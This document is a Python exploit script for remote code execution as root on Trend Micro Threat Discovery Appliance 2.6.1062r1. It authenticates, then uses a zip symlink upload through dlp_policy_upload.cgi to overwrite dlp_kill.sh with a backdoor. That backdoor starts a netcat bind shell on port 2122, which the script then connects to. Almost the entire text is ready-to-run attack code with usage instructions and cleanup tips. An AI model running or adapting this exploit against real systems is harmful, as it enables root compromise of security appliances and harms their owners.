Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution

import os import sys import time import zipfile import requests import threading from cStringIO import StringIO requests.packages.urllib3.disable_warnings() def _get_bd(): bd = """#!/bin/sh kill `pidof sensorworker sensormain` for i in `seq 0 4`; do sleep 1; sid=`pidof sensormain` if [ "$sid" -eq "" ]; then break else if [ $i -eq 4 ]; then kill -9 $sid fi fi done `%s>/dev/null` """ % c return bd def _build_zip(CREATE_SYMLINK=False): """ builds the zip file using a symlink attack into a folder... so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory and then crush the dlp_kill.sh only to then later get it executed resulting in rce as root. """ if CREATE_SYMLINK: zipinfo = zipfile.ZipInfo() zipinfo.filename = u'si' zipinfo.external_attr |= 0120000 << 16L # symlink file type zipinfo.compress_type = zipfile.ZIP_STORED f = StringIO() z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) if CREATE_SYMLINK: z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/") else: zipinfo = zipfile.ZipInfo("si/dlp_kill.sh") zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo # backdooring code, as we do z.writestr(zipinfo, _get_bd()) z.close() test = open('hax.zip','wb') test.write(f.getvalue()) test.close() return f.getvalue() def we_can_upload_a_zip(CREATE_SYMLINK=False): """ uploads a zip file with php code inside to our target for exploitation """ multiple_files = { 'Q_UPLOAD_ID': (None, ''), 'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'), 'submit': (None, 'Import') } r = s.post(upload_url, files=multiple_files, verify=False) if r.status_code == 200: return True return False def unzip(): try: r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False) except: pass return True def we_can_login(): r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) if "frame.cgi" in r.text: return True return False def main(): global c, s, t, p, login_url, unzip_url, upload_url if len(sys.argv) != 3: print "(+) usage: %s <target> <pass>" % sys.argv[0] print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0] sys.exit(-1) t = sys.argv[1] p = sys.argv[2] bu = "https://%s/" % t login_url = "%scgi-bin/logon.cgi" % bu unzip_url = "%scgi-bin/admin_dlp.cgi" % bu upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu s = requests.Session() # 1st we bypass auth and login if we_can_login(): # we just use a bind, demonstrating that the target doesnt even have a proper firewall! c = "nc -e /bin/sh -lp 2122" print "(+) logged into the target..." print "(+) performing initial preflight attack...!" print "(+) uploading the zipped symlink..." # 2nd we upload symlink attack if we_can_upload_a_zip(CREATE_SYMLINK=True): print "(+) successfuly uploaded the zipped symlink" print "(+) extracting the symlink..." # 3rd we extract it unzip() print "(+) extracted the symlink!" time.sleep(2) # let the server process things print "(+) uploading the zipped dlp_kill.sh..." # 4th we upload the backdoor if we_can_upload_a_zip(CREATE_SYMLINK=False): print "(+) successfuly uploaded the zipped log_cache.sh" print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..." # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh unzip() print "(+) extracted the dlp_kill.sh file!" print "(+) starting backdoor..." # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh thread = threading.Thread(target=unzip, args=()) thread.daemon = True thread.start() print "(+) backdoor started !" print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !" print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" time.sleep(2) os.system("nc %s 2122" % t) if __name__ == '__main__': main()